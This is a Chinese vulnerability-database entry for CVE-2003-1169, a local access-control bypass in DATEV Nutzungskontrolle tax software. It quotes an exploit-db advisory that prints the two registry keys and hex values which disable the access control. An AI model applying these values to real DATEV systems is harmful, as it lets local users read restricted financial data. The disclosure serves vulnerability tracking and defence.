DATEV Nutzungskontrolle未授权访问漏洞

DATEV Nutzungskontrolle未授权访问漏洞

漏洞ID 1107563 漏洞类型 访问验证错误
发布时间 2003-11-01 更新时间 2005-10-20
图片[1]-DATEV Nutzungskontrolle未授权访问漏洞-安全小百科CVE编号 CVE-2003-1169
图片[2]-DATEV Nutzungskontrolle未授权访问漏洞-安全小百科CNNVD-ID CNNVD-200312-454
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/23327
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-454
|漏洞详情
DATEVeG是一款税务相关系统,而Nutzungskontrolle(NUKO)用于对用户进行限制访问的软件,如一般用户不允许查看内部帐户数据。DATEVNutzungskontrolle对用户访问缺少正确的访问控制,远程攻击者可以利用这个漏洞未授权访问系统,获得敏感数据信息。本地用户可以通过修改部分Windows的注册表键值,就可以绕过软件的安全模型,访问受限制数据。
|漏洞EXP
source: http://www.securityfocus.com/bid/8950/info

It has been reported that DATEV Nutzungskontrolle may be prone to a access validation issue that may allow a local attacker to gain access to sensitive data. The issue presents itself as a local user is able modify certain keys in the Windows registry resulting in bypassing the security model of the software. This issue would not present itself if the registry keys were set to read only.

Successful exploitation of this issue may allow an attacker to gain access to sensitive data that could be used to launch further attacks against the system.

Nutzungskontrolle V.2.1 and V.2.2 has been reported to be prone to this issue, however other versions may be affected as well.

It is possible to deactivate the NUKO with just importing 2 registry
keys:

[HKEY_LOCAL_MACHINESOFTWAREDATEV]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb,08,48,e7,71,65,9b

[HKEY_LOCAL_MACHINESOFTWAREDATEVeGComponentsB0000046Versions1.0NukoInfos]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb,08,48,e7,71,65,9b
|参考资料

来源:XF
名称:nutzungskontrolle-registry-security-bypass(13589)
链接:http://xforce.iss.net/xforce/xfdb/13589
来源:BID
名称:8950
链接:http://www.securityfocus.com/bid/8950
来源:FULLDISC
名称:20031101DATEVNutzungskontrolleBypassing(REG)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013113.html
来源:NSFOCUS
名称:5620
链接:http://www.nsfocus.net/vulndb/5620

相关推荐: Urban Multiple Unspecified Stack Buffer Overflow Vulnerabilities

Urban Multiple Unspecified Stack Buffer Overflow Vulnerabilities 漏洞ID 1095991 漏洞类型 Boundary Condition Error 发布时间 2005-09-05 更新时间 2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享